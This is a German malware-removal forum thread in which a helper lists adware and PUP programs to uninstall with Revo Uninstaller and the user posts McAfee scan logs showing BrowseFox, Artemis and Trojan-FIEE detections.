Zurück   Trojaner-Board > Malware entfernen > Log-Analyse und Auswertung

Log-Analyse und Auswertung: Trojaner: FIEE!33F043CBDBF2

Windows 7 Wenn Du Dir einen Trojaner eingefangen hast oder ständig Viren Warnungen bekommst, kannst Du hier die Logs unserer Diagnose Tools zwecks Auswertung durch unsere Experten posten. Um Viren und Trojaner entfernen zu können, muss das infizierte System zuerst untersucht werden: Erste Schritte zur Hilfe. Beachte dass ein infiziertes System nicht vertrauenswürdig ist und bis zur vollständigen Entfernung der Malware nicht verwendet werden sollte.XML.

Antwort
Alt 26.04.2016, 15:58   #16
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Sry aber.. ich finde es nicht ( Tut mir wirklich leid

Alt 26.04.2016, 16:06   #17
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



dann kann man aber auch nix wirklich genaues übver die Funde sagen

Lade Dir bitte von hier Revo Uninstaller Download Revo Uninstaller (alternativ portable Revo Uninstaller) herunter.
  • Installiere und starte das Programm. (Bebilderte Anleitung zu Revo Uninstaller)
  • Klicke auf Optionen und wähle als Sprache Deutsch.
  • Suche im Uninstallerfeld nach den Programmen:

    Advanced SystemCare 9
    Amazon 1Button App
    AVG
    AVG PC TuneUp
    AVG Zen
    Bronze Aid
    Buzzdock
    Gameo
    IObit Malware Fighter 4
    IObit Uninstaller
    One System Care
    Surfing Protection
    Web Bar 2.0.5791.27750

  • Wähle die Programme nacheinander aus und klicke jedes Mal auf Uninstall.
  • Wähle anschließend den Modus "Moderat" aus.
  • Reste löschen:
    Klicke auf dann auf und dann auf .

 

__________________

__________________

Alt 27.04.2016, 15:51   #18
Maximilian1
 
Trojaner: FIEE!33F043CBDBF2 - Standard

Trojaner: FIEE!33F043CBDBF2



Ich habe endlich was für dich ))


Maximilian_ODS.LOG:

Code:
ATTFilter
2/25/2016	3:51:35 PM	Scan Started: 02/25/2016 03:51:35 PM

2/25/2016	3:52:57 PM	Total objects scanned: 19389

2/25/2016	3:52:57 PM	Objects detected: 0

2/25/2016	3:52:57 PM	Scan Done: 02/25/2016 03:52:57 PM

3/13/2016	4:29:17 PM	Scan Started: 03/13/2016 04:29:17 PM

3/13/2016	4:29:19 PM	Total objects scanned: 19

3/13/2016	4:29:19 PM	Objects detected: 0

3/13/2016	4:29:19 PM	Scan Done: 03/13/2016 04:29:19 PM

3/29/2016	10:50:51 PM	Scan Started: 03/29/2016 10:50:51 PM

3/29/2016	10:52:41 PM	Total objects scanned: 19564

3/29/2016	10:52:41 PM	Objects detected: 0

3/29/2016	10:52:41 PM	Scan Done: 03/29/2016 10:52:41 PM

4/6/2016	3:08:12 PM	Scan Started: 04/06/2016 03:08:12 PM

4/6/2016	3:09:48 PM	Total objects scanned: 19257

4/6/2016	3:09:48 PM	Objects detected: 0

4/6/2016	3:09:48 PM	Scan Done: 04/06/2016 03:09:48 PM

4/13/2016	4:04:09 PM	Scan Started: 04/13/2016 04:04:09 PM

4/13/2016	4:39:13 PM	Total objects scanned: 33964

4/13/2016	4:39:13 PM	Objects detected: 0

4/13/2016	4:39:13 PM	Scan Done: 04/13/2016 04:39:13 PM

4/19/2016	4:03:12 PM	Scan Started: 04/19/2016 04:03:12 PM

4/19/2016	4:25:55 PM	Total objects scanned: 276449

4/19/2016	4:25:55 PM	Objects detected: 0

4/19/2016	4:25:55 PM	Scan Done: 04/19/2016 04:25:55 PM

4/19/2016	8:44:18 PM	Scan Started: 04/19/2016 08:44:18 PM

4/19/2016	9:04:10 PM	Total objects scanned: 279790

4/19/2016	9:04:10 PM	Objects detected: 0

4/19/2016	9:04:10 PM	Scan Done: 04/19/2016 09:04:10 PM

4/26/2016	5:02:14 PM	Scan Started: 04/26/2016 05:02:14 PM

4/26/2016	5:02:14 PM	Total objects scanned: 0

4/26/2016	5:02:14 PM	Objects detected: 0

4/26/2016	5:02:14 PM	Scan Done: 04/26/2016 05:02:14 PM
         

OAS.LOG:

Code:
ATTFilter
12/25/2015	1:47:33 AM	"C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe"	"Artemis!2CECE6F6D093"	"2"

12/27/2015	2:27:44 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

12/27/2015	3:32:56 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

12/27/2015	7:32:56 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

12/28/2015	12:26:26 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

12/29/2015	12:28:48 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

12/29/2015	4:42:33 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/2/2016	2:37:46 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/2/2016	4:31:07 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/2/2016	9:36:51 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/3/2016	3:04:14 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/3/2016	5:04:14 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/4/2016	5:50:41 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/6/2016	4:21:16 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/8/2016	2:26:54 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/8/2016	9:44:35 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/9/2016	1:29:27 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/9/2016	3:43:26 PM	"C:\ProgramData\f7dd9bd0-5ea8-4002-b65f-bc21d39fe974\plugins\7\resources\40.0.0.dll"	"BrowseFox-FAD"	"3"

1/9/2016	6:49:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\tmp8207691\setup.exe"	"Artemis!69B9B790295A"	"3"

1/17/2016	1:11:46 PM	"C:\Users\Maximilian\AppData\Local\Temp\{00D8B382-FBF5-4579-ABAB-A24ACA0FD50C}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0268E7C1-CF93-4382-8DC9-5EE89A872135}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0A37D5BB-B2F2-448F-94E4-A38C7B782D88}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0AA306C2-2087-447A-9E8E-12D8698CDAE7}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{161E2EFA-4CE5-4604-82CA-A92C09006261}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{19193F1F-0891-4F37-B54A-456C922B435B}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{241226D8-81E2-49A2-8A32-9A2480DF85E0}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{39CD2D09-96CF-4A30-8014-B686B1DCAF9B}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{3A991E03-D5AD-4C90-A137-AA63A518A831}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{4C21733B-D6C9-4D26-9276-B8275CC24BB6}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{53925C0F-06EB-454A-A18E-E3A03ABC592D}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{56AB1F39-FFE1-4CEC-B2D3-85F4E295958F}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:47 PM	"C:\Users\Maximilian\AppData\Local\Temp\{65D35E2D-61E7-47D5-BDB8-0F488C0D77F0}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{77A8CFD0-DE1B-4874-A6C2-42F9BAD36353}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{7A04F5B8-25B2-4B1C-B2A4-B6469AB1D5C8}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{82C5EE06-7F14-4270-97F2-2CB78A9B3AD6}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{997BEA41-0448-4A2E-B6D6-09C9A8B59F88}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{9C95D521-D8D2-475C-BCC5-22E3BF6317C2}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A3FE12EB-BE9A-4406-AFBA-2F266322B073}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A763DC23-488C-470E-808E-22986DEE9C7C}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A8AC4013-6B95-4F0F-8EA0-CBB290D67DD1}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{C2C6E6ED-8E21-4F8F-BE43-E982D48D491D}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{CDD42E42-FB87-4ACE-807B-7EAEC3B00A64}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:48 PM	"C:\Users\Maximilian\AppData\Local\Temp\{D4C200CF-C7BC-4C3C-BA5B-5EB1B803B212}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E16E3AC9-919A-444B-8174-329E93BA295A}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E7B2CA9A-BBE6-4489-9B0C-38045A787FD2}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{EB423FE6-143F-4830-9520-579B4A753BBB}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F14A8ADF-4232-4A16-9CB8-8700A366D4ED}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F674CFC5-E64F-4F58-B27F-A5A0893A33B6}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F7FFBF24-C1EC-4B1C-AF87-1313FC20B43A}.dll"	"BrowseFox.q"	"3"

1/17/2016	1:11:49 PM	"C:\Users\Maximilian\AppData\Local\Temp\{FD7C2464-A81A-4821-9EB7-CD2B53EE4F8A}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{00D8B382-FBF5-4579-ABAB-A24ACA0FD50C}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0268E7C1-CF93-4382-8DC9-5EE89A872135}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0A37D5BB-B2F2-448F-94E4-A38C7B782D88}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{0AA306C2-2087-447A-9E8E-12D8698CDAE7}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{161E2EFA-4CE5-4604-82CA-A92C09006261}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:03 PM	"C:\Users\Maximilian\AppData\Local\Temp\{19193F1F-0891-4F37-B54A-456C922B435B}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{241226D8-81E2-49A2-8A32-9A2480DF85E0}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{39CD2D09-96CF-4A30-8014-B686B1DCAF9B}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{3A991E03-D5AD-4C90-A137-AA63A518A831}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{4C21733B-D6C9-4D26-9276-B8275CC24BB6}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{53925C0F-06EB-454A-A18E-E3A03ABC592D}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{56AB1F39-FFE1-4CEC-B2D3-85F4E295958F}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{65D35E2D-61E7-47D5-BDB8-0F488C0D77F0}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{77A8CFD0-DE1B-4874-A6C2-42F9BAD36353}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{7A04F5B8-25B2-4B1C-B2A4-B6469AB1D5C8}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{82C5EE06-7F14-4270-97F2-2CB78A9B3AD6}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:04 PM	"C:\Users\Maximilian\AppData\Local\Temp\{997BEA41-0448-4A2E-B6D6-09C9A8B59F88}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:05 PM	"C:\Users\Maximilian\AppData\Local\Temp\{9C95D521-D8D2-475C-BCC5-22E3BF6317C2}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:05 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A3FE12EB-BE9A-4406-AFBA-2F266322B073}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:05 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A763DC23-488C-470E-808E-22986DEE9C7C}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{A8AC4013-6B95-4F0F-8EA0-CBB290D67DD1}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{C2C6E6ED-8E21-4F8F-BE43-E982D48D491D}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{CDD42E42-FB87-4ACE-807B-7EAEC3B00A64}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{D4C200CF-C7BC-4C3C-BA5B-5EB1B803B212}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E16E3AC9-919A-444B-8174-329E93BA295A}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{E7B2CA9A-BBE6-4489-9B0C-38045A787FD2}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{EB423FE6-143F-4830-9520-579B4A753BBB}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F14A8ADF-4232-4A16-9CB8-8700A366D4ED}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F674CFC5-E64F-4F58-B27F-A5A0893A33B6}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{F7FFBF24-C1EC-4B1C-AF87-1313FC20B43A}.dll"	"BrowseFox.q"	"3"

1/21/2016	8:54:06 PM	"C:\Users\Maximilian\AppData\Local\Temp\{FD7C2464-A81A-4821-9EB7-CD2B53EE4F8A}.dll"	"BrowseFox.q"	"3"

1/26/2016	8:14:59 PM	"C:\Users\Maximilian\AppData\Local\Temp\2051208.tmp"	"Artemis!121B3B521E1F"	"3"

2/19/2016	2:32:35 PM	"C:\program files\webbar\2.0.5791.27750\wb.exe"	"Artemis!FA5972C3DF65"	"2"

3/17/2016	5:52:10 PM	"C:\Users\Maximilian\AppData\Local\Temp\F80DD74ECDA530855AA86E4D608AC88A.exe"	"Artemis!617B0895144C"	"2"

3/18/2016	5:52:19 PM	"C:\Users\Maximilian\AppData\Local\Temp\F80DD74ECDA530855AA86E4D608AC88A.exe"	"Artemis!617B0895144C"	"3"

3/20/2016	5:52:09 PM	"C:\Users\Maximilian\AppData\Local\Temp\F80DD74ECDA530855AA86E4D608AC88A.exe"	"Artemis!617B0895144C"	"3"

4/1/2016	8:41:05 PM	"C:\ProgramData\83adbc82-4da7-0\83adbc82-4da7-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	8:41:05 PM	"C:\ProgramData\83adbc82-24e3-1\83adbc82-24e3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	8:42:05 PM	"C:\ProgramData\83adbc82-24e3-1\83adbc82-24e3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/1/2016	8:42:05 PM	"C:\ProgramData\83adbc82-4da7-0\83adbc82-4da7-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/2/2016	8:41:16 PM	"C:\ProgramData\83adbc82-4c27-0\83adbc82-4c27-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/2/2016	8:41:18 PM	"C:\ProgramData\83adbc82-5df3-1\83adbc82-5df3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/3/2016	8:41:04 PM	"C:\ProgramData\83adbc82-6541-1\83adbc82-6541-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/3/2016	8:41:04 PM	"C:\ProgramData\83adbc82-79f3-0\83adbc82-79f3-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/7/2016	8:41:04 PM	"C:\ProgramData\83adbc82-47d1-1\83adbc82-47d1-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/7/2016	8:41:06 PM	"C:\ProgramData\83adbc82-3737-0\83adbc82-3737-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/7/2016	8:42:05 PM	"C:\ProgramData\83adbc82-47d1-1\83adbc82-47d1-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/7/2016	8:42:09 PM	"C:\ProgramData\83adbc82-3737-0\83adbc82-3737-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/10/2016	8:41:04 PM	"C:\ProgramData\83adbc82-52d1-1\83adbc82-52d1-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/10/2016	8:41:04 PM	"C:\ProgramData\83adbc82-0347-0\83adbc82-0347-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/10/2016	8:42:05 PM	"C:\ProgramData\83adbc82-52d1-1\83adbc82-52d1-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/10/2016	8:42:07 PM	"C:\ProgramData\83adbc82-0347-0\83adbc82-0347-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/11/2016	8:41:05 PM	"C:\ProgramData\83adbc82-2e25-0\83adbc82-2e25-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/11/2016	8:41:05 PM	"C:\ProgramData\83adbc82-7bb3-1\83adbc82-7bb3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/11/2016	8:42:06 PM	"C:\ProgramData\83adbc82-2e25-0\83adbc82-2e25-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/11/2016	8:42:08 PM	"C:\ProgramData\83adbc82-7bb3-1\83adbc82-7bb3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/12/2016	2:41:04 PM	"C:\ProgramData\83adbc82-5991-1\83adbc82-5991-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/12/2016	2:41:04 PM	"C:\ProgramData\83adbc82-0703-0\83adbc82-0703-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/12/2016	2:42:06 PM	"C:\ProgramData\83adbc82-5991-1\83adbc82-5991-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/12/2016	2:42:09 PM	"C:\ProgramData\83adbc82-0703-0\83adbc82-0703-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	2:41:04 PM	"C:\ProgramData\83adbc82-5181-1\83adbc82-5181-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	2:41:05 PM	"C:\ProgramData\83adbc82-2505-0\83adbc82-2505-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	2:42:05 PM	"C:\ProgramData\83adbc82-5181-1\83adbc82-5181-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	2:42:05 PM	"C:\ProgramData\83adbc82-2505-0\83adbc82-2505-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	8:41:18 PM	"C:\ProgramData\83adbc82-6771-0\83adbc82-6771-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	8:41:34 PM	"C:\ProgramData\83adbc82-4b47-1\BITF627.tmp"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	8:41:34 PM	"C:\ProgramData\83adbc82-6771-0\BITF637.tmp"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/13/2016	8:42:22 PM	"C:\ProgramData\83adbc82-6771-0\83adbc82-6771-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	2:41:03 PM	"C:\ProgramData\83adbc82-35c7-1\83adbc82-35c7-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	2:41:03 PM	"C:\ProgramData\83adbc82-0887-0\83adbc82-0887-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	2:42:06 PM	"C:\ProgramData\83adbc82-35c7-1\83adbc82-35c7-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	2:42:07 PM	"C:\ProgramData\83adbc82-0887-0\83adbc82-0887-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	8:41:05 PM	"C:\ProgramData\83adbc82-59a3-0\83adbc82-59a3-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	8:41:05 PM	"C:\ProgramData\83adbc82-2c55-1\83adbc82-2c55-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	8:42:07 PM	"C:\ProgramData\83adbc82-2c55-1\83adbc82-2c55-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/14/2016	8:42:07 PM	"C:\ProgramData\83adbc82-59a3-0\83adbc82-59a3-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/15/2016	5:52:04 PM	"C:\ProgramData\83adbc82-4b47-1\83adbc82-4b47-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/15/2016	8:41:04 PM	"C:\ProgramData\83adbc82-5eb3-1\83adbc82-5eb3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/15/2016	8:41:05 PM	"C:\ProgramData\83adbc82-3233-0\83adbc82-3233-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/15/2016	8:42:04 PM	"C:\ProgramData\83adbc82-3233-0\83adbc82-3233-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/15/2016	8:42:04 PM	"C:\ProgramData\83adbc82-5eb3-1\83adbc82-5eb3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/16/2016	8:41:10 PM	"C:\ProgramData\83adbc82-32d3-0\83adbc82-32d3-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/16/2016	8:41:10 PM	"C:\ProgramData\83adbc82-4047-1\83adbc82-4047-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/16/2016	8:42:11 PM	"C:\ProgramData\83adbc82-4047-1\83adbc82-4047-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/16/2016	8:42:11 PM	"C:\ProgramData\83adbc82-32d3-0\83adbc82-32d3-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/18/2016	8:41:04 PM	"C:\ProgramData\83adbc82-4467-1\83adbc82-4467-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/18/2016	8:41:04 PM	"C:\ProgramData\83adbc82-6e35-0\83adbc82-6e35-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/18/2016	8:42:08 PM	"C:\ProgramData\83adbc82-6e35-0\83adbc82-6e35-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/18/2016	8:42:08 PM	"C:\ProgramData\83adbc82-4467-1\83adbc82-4467-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/19/2016	8:41:04 PM	"C:\ProgramData\83adbc82-3aa3-1\83adbc82-3aa3-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/19/2016	8:41:04 PM	"C:\ProgramData\83adbc82-46e1-0\83adbc82-46e1-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/21/2016	8:41:13 PM	"C:\ProgramData\83adbc82-7737-1\83adbc82-7737-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/21/2016	8:41:14 PM	"C:\ProgramData\83adbc82-69b1-0\83adbc82-69b1-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/22/2016	8:41:04 PM	"C:\ProgramData\83adbc82-5097-1\83adbc82-5097-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/22/2016	8:41:04 PM	"C:\ProgramData\83adbc82-49f5-0\83adbc82-49f5-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/22/2016	8:42:03 PM	"C:\ProgramData\83adbc82-49f5-0\83adbc82-49f5-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/22/2016	8:42:06 PM	"C:\ProgramData\83adbc82-5097-1\83adbc82-5097-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/23/2016	8:42:32 PM	"C:\ProgramData\7607d362-5383-1\7607d362-5383-1.d"	"Generic PUP.x"	"3"

4/23/2016	8:42:32 PM	"C:\ProgramData\7607d362-4057-0\7607d362-4057-0.d"	"Generic PUP.x"	"3"

4/23/2016	8:42:32 PM	"C:\ProgramData\7607d362-5383-1\7607d362-5383-1.d"	"Generic PUP.x"	"3"

4/23/2016	8:42:32 PM	"C:\ProgramData\7607d362-4057-0\7607d362-4057-0.d"	"Generic PUP.x"	"3"

4/23/2016	8:44:22 PM	"C:\ProgramData\83adbc82-10a7-0\83adbc82-10a7-0.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/23/2016	8:44:27 PM	"C:\ProgramData\83adbc82-1851-1\83adbc82-1851-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

4/23/2016	8:44:27 PM	"C:\ProgramData\83adbc82-1851-1\83adbc82-1851-1.d"	"Trojan-FIEE!33F043CBDBF2"	"2"

